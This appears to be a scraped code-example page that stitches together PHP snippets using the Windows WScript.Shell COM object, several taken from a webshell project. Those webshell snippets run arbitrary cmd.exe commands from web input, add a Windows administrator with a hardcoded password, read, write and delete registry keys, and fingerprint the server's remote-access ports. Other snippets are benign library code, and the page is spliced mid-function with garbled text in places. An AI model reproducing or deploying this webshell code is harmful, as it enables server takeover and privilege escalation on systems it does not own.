$adminmail = isset($_SERVER['SERVER_ADMIN']) ? "<a href=\"mailto:" . $_SERVER['SERVER_ADMIN'] . "\">" . $_SERVER['SERVER_ADMIN'] . "</a>" : "<a href=\"mailto:" . get_cfg_var("sendmail_from") . "\">" . get_cfg_var("sendmail_from") . "</a>";
        if ($dis_func == "") {
            $dis_func = "No";
        } else {
            $dis_func = str_replace(" ", "<br>", $dis_func);
            $dis_func = str_replace(",", "<br>", $dis_func);
        }
        $phpinfo = !eregi("phpinfo", $dis_func) ? "Yes" : "No";
        $info = array(array("服务器时间", date("Y年m月d日 h:i:s", time())), array("服务器域名", "<a href=\"http://" . $_SERVER['SERVER_NAME'] . "\" target=\"_blank\">" . $_SERVER['SERVER_NAME'] . "</a>"), array("服务器IP地址", gethostbyname($_SERVER['SERVER_NAME'])), array("服务器操作系统", PHP_OS), array("服务器操作系统文字编码", $_SERVER['HTTP_ACCEPT_LANGUAGE']), array("服务器解译引擎", $_SERVER['SERVER_SOFTWARE']), array("你的IP", $_SERVER["REMOTE_ADDR"]), array("Web服务端口", $_SERVER['SERVER_PORT']), array("PHP运行方式", strtoupper(php_sapi_name())), array("PHP版本", PHP_VERSION), array("运行于安全模式", Info_Cfg("safemode")), array("服务器管理员", $adminmail), array("本文件路径", myaddress), array("允许使用 URL 打开文件 allow_url_fopen", Info_Cfg("allow_url_fopen")), array("允许使用curl_exec", Info_Fun("curl_exec")), array("允许动态加载链接库 enable_dl", Info_Cfg("enable_dl")), array("显示错误信息 display_errors", Info_Cfg("display_errors")), array("自动定义全局变量 register_globals", Info_Cfg("register_globals")), array("magic_quotes_gpc", Info_Cfg("magic_quotes_gpc")), array("程序最多允许使用内存量 memory_limit", Info_Cfg("memory_limit")), array("POST最大字节数 post_max_size", Info_Cfg("post_max_size")), array("允许最大上传文件 upload_max_filesize", $upsize), array("程序最长运行时间 max_execution_time", Info_Cfg("max_execution_time") . "秒"), array("被禁用的函数 disable_functions", $dis_func), array("phpinfo()", $phpinfo), array("目前还有空余空间diskfreespace", intval(diskfreespace(".") / (1024 * 1024)) . 'Mb'), array("图形处理 GD Library", Info_Fun("imageline")), array("IMAP电子邮件系统", Info_Fun("imap_close")), array("MySQL数据库", Info_Fun("mysql_close")), array("SyBase数据库", Info_Fun("sybase_close")), array("Oracle数据库", Info_Fun("ora_close")), array("Oracle 8 数据库", Info_Fun("OCILogOff")), array("PREL相容语法 PCRE", Info_Fun("preg_match")), array("PDF文档支持", Info_Fun("pdf_close")), array("Postgre SQL数据库", Info_Fun("pg_close")), array("SNMP网络管理协议", Info_Fun("snmpget")), array("压缩文件支持(Zlib)", Info_Fun("gzclose")), array("XML解析", Info_Fun("xml_set_object")), array("FTP", Info_Fun("ftp_login")), array("ODBC数据库连接", Info_Fun("odbc_close")), array("Session支持", Info_Fun("session_start")), array("Socket支持", Info_Fun("fsockopen")));
        $shell = new COM("WScript.Shell") or die("This thing requires Windows Scripting Host");
        echo '<table width="100%" border="0">';
        for ($i = 0; $i < count($info); $i++) {
            echo '<tr><td width="40%">' . $info[$i][0] . '</td><td>' . $info[$i][1] . '</td></tr>' . "\n";
        }
        try {
            $registry_proxystring = $shell->RegRead("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\\PortNumber");
            $Telnet = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\TelnetServer\\1.0\\TelnetPort");
            $PcAnywhere = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Symantec\\pcAnywhere\\CurrentVersion\\System\\TCPIPDataPort");
        } catch (Exception $e) {
        }
        echo '<tr><td width="40%">Terminal Service端口为</td><td>' . $registry_proxystring . '</td></tr>' . "\n";
        echo '<tr><td width="40%">Telnet端口为</td><td>' . $Telnet . '</td></tr>' . "\n";
        echo '<tr><td width="40%">PcAnywhere端口为</td><td>' . $PcAnywhere . '</td></tr>' . "\n";
        echo '</table>';
        break;
    case "nc":
        $M_ip = isset($_POST['mip']) ? $_POST['mip'] : $_SERVER["REMOTE_ADDR"];
        $B_port = isset($_POST['bport']) ? $_POST['bport'] : '1019';
        print <<<END
<form method="POST">
<div class="actall">使用方法:<br>
 /**
  * Returns the fully-qualified domain name of the server
  * 
  * @internal
  * 
  * @return string  The fully-qualified domain name of the server
  */
 public static function getFQDN()
 {
     if (self::$fqdn !== NULL) {
         return self::$fqdn;
     }
     if (isset($_ENV['HOST'])) {
         self::$fqdn = $_ENV['HOST'];
     }
     if (strpos(self::$fqdn, '.') === FALSE && isset($_ENV['HOSTNAME'])) {
         self::$fqdn = $_ENV['HOSTNAME'];
     }
     if (strpos(self::$fqdn, '.') === FALSE) {
         self::$fqdn = php_uname('n');
     }
     if (strpos(self::$fqdn, '.') === FALSE) {
         $can_exec = !in_array('exec', array_map('trim', explode(',', ini_get('disable_functions')))) && !ini_get('safe_mode');
         if (fCore::checkOS('linux') && $can_exec) {
             self::$fqdn = trim(shell_exec('hostname --fqdn'));
         } elseif (fCore::checkOS('windows')) {
             $shell = new COM('WScript.Shell');
             $tcpip_key = 'HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Tcpip';
             try {
                 $domain = $shell->RegRead($tcpip_key . '\\Parameters\\NV Domain');
             } catch (com_exception $e) {
                 try {
                     $domain = $shell->RegRead($tcpip_key . '\\Parameters\\DhcpDomain');
                 } catch (com_exception $e) {
                     try {
                         $adapters = $shell->RegRead($tcpip_key . '\\Linkage\\Route');
                         foreach ($adapters as $adapter) {
                             if ($adapter[0] != '{') {
                                 continue;
                             }
                             try {
                                 $domain = $shell->RegRead($tcpip_key . '\\Interfaces\\' . $adapter . '\\Domain');
                             } catch (com_exception $e) {
                                 try {
                                     $domain = $shell->RegRead($tcpip_key . '\\Interfaces\\' . $adapter . '\\DhcpDomain');
                                 } catch (com_exception $e) {
                                 }
                             }
                         }
                     } catch (com_exception $e) {
                     }
                 }
             }
             if (!empty($domain)) {
                 self::$fqdn = '.' . $domain;
             }
         } elseif (!fCore::checkOS('windows') && !ini_get('open_basedir') && file_exists('/etc/resolv.conf')) {
             $output = file_get_contents('/etc/resolv.conf');
             if (preg_match('#^domain ([a-z0-9_.-]+)#im', $output, $match)) {
                 self::$fqdn .= '.' . $match[1];
             }
         }
     }
     return self::$fqdn;
 }
示例#3
0
文件: silic.php 项目: evil7/webshell
function winshell()
{
    $nop = '&nbsp;&nbsp;';
    if ($_GET['winshell'] == 'wscript') {
        $wcmd = $_POST['wcmd'] ? $_POST['wcmd'] : 'net user';
        $wcpth = $_POST['wcpth'] ? $_POST['wcpth'] : 'cmd.exe';
        print <<<END
<div class="actall">
<form action="?s=jk&winshell=wscript" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
{$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcpth}" style="width:300px;"> -&gt; CMD·��<br />
{$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcmd}" style="width:300px;"> <input type="submit" value="ִ��" style="width:80px;">
<br><br><br></form></div>
END;
        if ($_POST['do'] == 'do') {
            $ww = $wcpth . " /c " . $wcmd;
            $phpwsh = new COM("Wscript.Shell") or die("����Shell.Wscript����ʧ��");
            $phpexec = $phpwsh->exec($ww);
            $execoutput = $wshexec->stdout();
            $result = $execoutput->readall();
            echo $result;
            @$phpwsh->Release();
            $phpwsh = NULL;
        }
    } elseif ($_GET['winshell'] == 'shelluser') {
        $wuser = $_POST['wuser'] ? $_POST['wuser'] : '******';
        $wpasw = $_POST['wpasw'] ? $_POST['wpasw'] : '1234@silic#';
        print <<<END
<div class="actall">
<form action="?s=jk&winshell=shelluser" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
Shell.Users�������ӹ���Ա<br><br>
{$nop}�½��û�����<input type="text" name="wuser" id="wuser" value="{$wuser}" style="width:100px;"><br>
{$nop}���û����룺<input type="text" name="wpasw" id="wpasw" value="{$wpasw}" style="width:100px;"><br><br>
<input type="submit" value="����" style="width:80px;">
<br><br><br></form></div>
END;
        if ($_POST['do'] = 'do') {
            $shell = new COM("Shell.Users");
            $cmd = $shell->create($wuser);
            $cmd->changePassword($wpasw, "");
            $cmd->setting["AccountType"] = 3;
        }
    } elseif ($_GET['winshell'] == 'regedit') {
        $regpath = $_POST['regpath'] ? $_POST['regpath'] : 'HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\\PortNumber';
        print <<<END
<div class="actall">
<form action="?s=jk&winshell=regedit" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
RegRead()������ȡע��������(Shell.Wscript����)<br><br>
ע����·����<br>
{$nop}<input type="text" name="regpath" id="regpath" value="{$regpath}" style="width:720px;"><br><br>
<input type="submit" value="��ȡ����" style="width:80px;">
<br><br><br></form></div>
END;
        if ($_POST['do'] == 'do') {
            $shell = new COM("WScript.Shell") or die("����Shell.Wscript����ʧ��");
            try {
                $registry_proxystring = $shell->RegRead($regpath);
            } catch (Exception $e) {
                echo '����: ' . $e->getMessage();
            }
            echo $registry_proxystring;
        }
    } else {
        $tip = "�ݲ��Ա����ܿ��õĿ�����Ϊ����֮һ<br>Webshell���ڷ���������ΪWindowsϵͳ<br>PHP��Ȩ����������ڷdz����ε�ʱ�����Գ��Ա�����<br></h5><br><br><br>";
        print <<<END
<div class="actall"><pre>
<br><a href="?s=jk&winshell=wscript"> [ WScript���� ] </a><br><br>
<h5>������ʹ��PHP����Windows�����е�Wscript������<br>
Wscript����cmd��������<br>{$tip}<a href="?s=jk&winshell=shelluser"> [ Shell.User���� ] </a><br><br>
<h5>������ʹ��PHP����Windows�����е�Shell.user����<br>
USER����ΪWindowsϵͳ�û�������������<br>{$tip}<a href="?s=jk&winshell=regedit"> [ ע������ȡ ] </a><br><br>
<h5>������ʹ��PHP����Windows�����е�Shell.Wscript����<br>
RegRead()������ȡϵͳע��������<br>{$tip}</pre></div>
END;
    }
}
示例#4
0
 public function getImageMagickVersion()
 {
     static $version = null;
     if (!$version && $this->isWindows()) {
         // IM stores this in the registry if you use the installer.
         if (class_exists('COM', false)) {
             $shell = new \COM('WScript.Shell');
             if ($shell) {
                 $version = $shell->RegRead('HKEY_LOCAL_MACHINE\\SOFTWARE\\ImageMagick\\Current\\Version');
             }
         }
     }
     if (!$version) {
         // Old-fashioned way.
         exec($this->getImageMagickConvert() . ' -version', $output, $status);
         if ($status) {
             throw new ImageMagickException('ImageMagick was not found.');
         }
         $first_line = $output[0];
         preg_match('/Version: ImageMagick (\\d+\\.\\d+\\.\\d+)/', $first_line, $matches);
         $version = $matches[1];
     }
     return $version;
 }
示例#5
0
 function StartSendingMessage()
 {
     if (strlen($this->mailroot_directory) == 0) {
         if (function_exists("class_exists") && class_exists("COM")) {
             $shell = new COM("WScript.Shell");
             $wwwroot = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\InetStp\\PathWWWRoot");
             if (is_dir($wwwroot)) {
                 $mailroot = $wwwroot . "\\..\\mailroot";
                 if (is_dir($mailroot . "\\Pickup")) {
                     $this->mailroot_directory = $mailroot;
                 } else {
                     $mailroot = $wwwroot . "\\mailroot";
                     if (is_dir($mailroot . "\\Pickup")) {
                         $this->mailroot_directory = $mailroot;
                     }
                 }
             }
         }
     }
     if (strlen($this->mailroot_directory) == 0) {
         return $this->OutputError("it was not specified the mailroot directory path");
     }
     if (!is_dir($this->mailroot_directory . "\\Pickup")) {
         return $this->OutputError("the specified mailroot path " . $this->mailroot_directory . " does not contain a Pickup directory");
     }
     $this->pickup_file_name = tempnam(GetEnv("TMP"), "eml");
     if (!($this->pickup_file = @fopen($this->pickup_file_name, "w"))) {
         return $this->OutputPHPError("could not create a pickup message file " . $this->pickup_file_name, $php_errormsg);
     }
     return "";
 }
示例#6
0
function phpreg()
{
    $shell1 = new COM("wscript.shell") or die("require windows host");
    $action = isset($_POST['action']) ? $_POST['action'] : '';
    echo '<div class="actall"><h5>Windows注册表读写</h5></div>';
    print <<<END
<TR><form action="" method="post">   
<div class="actall"><TD WIDTH=100 VALIGN=TOP ALIGN=CENTER>   
路径:<input type="hidden" name="action" value="读取">   
<input type="text" name="rpath" value="{$rpath}" size="70">   
<input class="bt" type="submit" value="读取"></form><br></TD></TR></div>   
END;
    $rpath = isset($_POST['rpath']) ? $_POST['rpath'] : '';
    $rpath = str_replace("\\\\", "\\", $rpath);
    if ($action == "read") {
        $out = $shell1->RegRead($rpath);
        echo '<pre>' . var_dump($out) . '</pre>';
    }
    print <<<END
<TR><form action="" method="post">   
<div class="actall"><TD WIDTH=100 VALIGN=TOP ALIGN=CENTER>位置:<input type="text" name="wpath" value="{$wpath}" size="70"><BR><br> 
类型:<input type="text" name="wtype" value="{$wtype}" size="20"> 值:<input type="text" name="wvalue" value="{$wvalue}" size="30">
<input type="hidden" name="action" value="write"><input class="bt" type="submit" value="写入"></form></TD></TR></div>   
END;
    $wpath = isset($_POST['wpath']) ? $_POST['wpath'] : '';
    $wpath = str_replace("\\\\", "\\", $wpath);
    $wtype = isset($_POST['wtype']) ? $_POST['wtype'] : '';
    $wvalue = isset($_POST['wvalue']) ? $_POST['wvalue'] : '';
    if ($action == "write") {
        $shell1->RegWrite($wpath, $wvalue, $wtype);
    }
    print <<<END
<TR><form action="" method="post">   
<div class="actall"><TD WIDTH=100 VALIGN=TOP ALIGN=CENTER>  
位置:<input type="hidden" name="action" value="del">   
<input type="text" name="dpath" value="{$dpath}" size="70">   
<input class="bt" type="submit" value="删"></form></TD></TR></div>   
END;
    $dpath = isset($_POST['dpath']) ? $_POST['dpath'] : '';
    $dpath = str_replace("\\\\", "\\", $dpath);
    if ($action == "del") {
        $out = $shell1->RegDelete($dpath);
    }
}
示例#7
0
function winshell()
{
    $nop = '&nbsp;&nbsp;';
    if ($_GET['winshell'] == 'wscript') {
        $wcmd = $_POST['wcmd'] ? $_POST['wcmd'] : 'net user';
        $wcpth = $_POST['wcpth'] ? $_POST['wcpth'] : 'cmd.exe';
        print <<<END
<div class="actall">
<form action="?s=jk&winshell=wscript" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
{$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcpth}" style="width:300px;"> -&gt; CMD路径<br />
{$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcmd}" style="width:300px;"> <input type="submit" value="执行" style="width:80px;">
<br><br><br></form></div>
END;
        if ($_POST['do'] == 'do') {
            $ww = $wcpth . " /c " . $wcmd;
            $phpwsh = new COM("Wscript.Shell") or die("创建Shell.Wscript组件失败");
            $phpexec = $phpwsh->exec($ww);
            $execoutput = $wshexec->stdout();
            $result = $execoutput->readall();
            echo $result;
            @$phpwsh->Release();
            $phpwsh = NULL;
        }
    } elseif ($_GET['winshell'] == 'shelluser') {
        $wuser = $_POST['wuser'] ? $_POST['wuser'] : '******';
        $wpasw = $_POST['wpasw'] ? $_POST['wpasw'] : '1234@silic#';
        print <<<END
<div class="actall">
<form action="?s=jk&winshell=shelluser" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
Shell.Users组件添加管理员<br><br>
{$nop}新建用户名:<input type="text" name="wuser" id="wuser" value="{$wuser}" style="width:100px;"><br>
{$nop}新用户密码:<input type="text" name="wpasw" id="wpasw" value="{$wpasw}" style="width:100px;"><br><br>
<input type="submit" value="添加" style="width:80px;">
<br><br><br></form></div>
END;
        if ($_POST['do'] = 'do') {
            $shell = new COM("Shell.Users");
            $cmd = $shell->create($wuser);
            $cmd->changePassword($wpasw, "");
            $cmd->setting["AccountType"] = 3;
        }
    } elseif ($_GET['winshell'] == 'regedit') {
        $regpath = $_POST['regpath'] ? $_POST['regpath'] : 'HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\\PortNumber';
        print <<<END
<div class="actall">
<form action="?s=jk&winshell=regedit" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
RegRead()函数读取注册表内容(Shell.Wscript组件)<br><br>
注册表路径:<br>
{$nop}<input type="text" name="regpath" id="regpath" value="{$regpath}" style="width:720px;"><br><br>
<input type="submit" value="读取内容" style="width:80px;">
<br><br><br></form></div>
END;
        if ($_POST['do'] == 'do') {
            $shell = new COM("WScript.Shell") or die("创建Shell.Wscript组件失败");
            try {
                $registry_proxystring = $shell->RegRead($regpath);
            } catch (Exception $e) {
                echo '内容: ' . $e->getMessage();
            }
            echo $registry_proxystring;
        }
    } else {
        $tip = "据测试本功能可用的可能性为万分之一<br>Webshell所在服务器必须为Windows系统<br>PHP提权很灵活,但你在非常无奈的时候可以尝试本功能<br></h5><br><br><br>";
        print <<<END
<div class="actall"><pre>
<br><a href="?s=jk&winshell=wscript"> [ WScript组件 ] </a><br><br>
<h5>本功能使用PHP调用Windows组件中的Wscript组件。<br>
Wscript为调用cmd命令组件<br>{$tip}<a href="?s=jk&winshell=shelluser"> [ Shell.User组件 ] </a><br><br>
<h5>本功能使用PHP调用Windows组件中的Shell.user组件<br>
USER组件为Windows系统用户操作相关组件<br>{$tip}<a href="?s=jk&winshell=regedit"> [ 注册表读取 ] </a><br><br>
<h5>本功能使用PHP调用Windows组件中的Shell.Wscript组件<br>
RegRead()函数读取系统注册表内容<br>{$tip}</pre></div>
END;
    }
}